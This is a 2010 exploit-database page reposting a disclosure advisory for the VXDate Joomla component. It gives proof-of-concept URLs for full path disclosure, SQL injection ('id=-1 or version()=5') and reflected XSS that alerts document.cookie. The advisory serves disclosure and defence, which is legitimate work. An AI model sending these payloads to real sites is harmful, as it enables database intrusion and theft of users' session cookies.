|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 7975 Credit : MustLive Date : 17.03.2010 Exploit Code : --------------------------------------------------------------------------- ---------------------------------- I want to warn you about vulnerabilities in component VXDate for Joomla. ----------------------------- Advisory: Vulnerabilities in VXDate for Joomla ----------------------------- URL: http://websecurity.com.ua/3849/ ----------------------------- Timeline: 10.05.2009 - found the vulnerabilities. 12.01.2010 - announced at my site. 18.01.2010 - informed developers. 13.03.2010 - disclosed at my site. ----------------------------- Details: These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities. Full path disclosure: http://site/index.php?option=com_vxdate&ct=’ http://site/index.php?option=com_vxdate&ct=1&md=details&id=’ http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’ SQL Injection: http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20versio n()=5 http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20versi on()=5 XSS: http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealer t(document.cookie)%3C/script%3E http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Eale rt(document.cookie)%3C/script%3E Vulnerable are potentially all versions of VXDate.  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |